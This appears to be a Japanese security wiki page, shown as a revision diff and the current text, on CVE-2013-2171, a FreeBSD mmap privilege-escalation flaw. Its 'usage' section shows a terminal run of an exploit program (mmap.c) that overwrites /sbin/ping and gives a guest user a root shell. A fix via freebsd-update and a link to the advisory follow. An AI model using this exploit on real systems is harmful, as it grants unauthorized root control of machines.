「CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性」の版間の差分
提供: セキュリティ
細 |
|||
(同じ利用者による、間の1版が非表示) | |||
行1: | 行1: | ||
− | + | CVE-2013-2171 は、 [[FreeBSD]] の mmap を利用した[[権限昇格]]の[[脆弱性]]です。 | |
− | + | ||
− | + | ||
− | + | ||
− | CVE-2013-2171 は、 [[FreeBSD]] の | + | |
− | + | ||
+ | '''読み方''' | ||
+ | ;[[脆弱性]]:ぜいじゃくせい | ||
__TOC__ | __TOC__ | ||
== 概要 == | == 概要 == | ||
− | + | CVE-2013-2171 は、 [[FreeBSD]] の mmap を利用した[[権限昇格]]の[[脆弱性]]です。 | |
− | CVE-2013-2171 は、 [[FreeBSD]] の | + | |
FreeBSD 9.0+ 以上に影響があります。 | FreeBSD 9.0+ 以上に影響があります。 | ||
FreeBSD 9.0R, FreeBSD 9.1R で試しました。 | FreeBSD 9.0R, FreeBSD 9.1R で試しました。 | ||
− | |||
== 使い方 == | == 使い方 == | ||
− | |||
[[権限昇格]]の例は、以下の通りです。 | [[権限昇格]]の例は、以下の通りです。 | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
行35: | 行29: | ||
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users) | uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users) | ||
</syntaxhighlight> | </syntaxhighlight> | ||
− | |||
== 対処方法 == | == 対処方法 == | ||
− | + | freebsd-update で更新します。 | |
− | + | ||
− | + | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
% sudo freebsd-update fetch | % sudo freebsd-update fetch | ||
% sudo freebsd-update install | % sudo freebsd-update install | ||
</syntaxhighlight> | </syntaxhighlight> | ||
− | |||
== 関連項目 == | == 関連項目 == | ||
− | |||
* [[脆弱性]] | * [[脆弱性]] | ||
* [http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc FreeBSD-SA-13:06.mmap.asc] | * [http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc FreeBSD-SA-13:06.mmap.asc] | ||
+ | <!-- | ||
+ | vim: filetype=mediawiki | ||
+ | --> |
2015年9月22日 (火) 10:42時点における最新版
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
読み方
- 脆弱性
- ぜいじゃくせい
概要
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。
使い方
権限昇格の例は、以下の通りです。
vm% uname -a FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0: Mon Apr 29 18:11:52 UTC 2013 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 vm% id uid=1008(guest) gid=1001(users) groups=1001(users) vm% gcc mmap.c vm% ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 58383 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)
対処方法
freebsd-update で更新します。
% sudo freebsd-update fetch % sudo freebsd-update install